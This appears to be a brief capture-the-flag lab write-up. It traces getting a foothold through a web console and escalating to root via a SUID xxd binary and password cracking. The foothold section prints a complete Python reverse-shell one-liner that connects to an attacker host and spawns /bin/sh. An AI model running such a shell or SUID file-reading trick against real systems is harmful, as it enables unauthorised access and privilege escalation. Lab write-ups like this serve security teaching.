
TL;DR
- The directory scans has revealed /console
- Console is an application which can run python os command on the server
- We get shell as Megan
- Suid reveals xxd which can read protected files
- We manage to crack the root password

NETWORK

ENUMERATION



Directories scan

FOOTHOLD
Console



Running the following
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.0.3",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
get a shell as user “Megan”

PRIV ESCALATION
Better shell
Going through enumeration of the machine we have found the an ssh key for user Megan


Vulnerable xxd
The suid have revealed the following

Using xxd we can read protected file with xxd

Let’s crack the password found on this machine




CAPTURE FLAGS
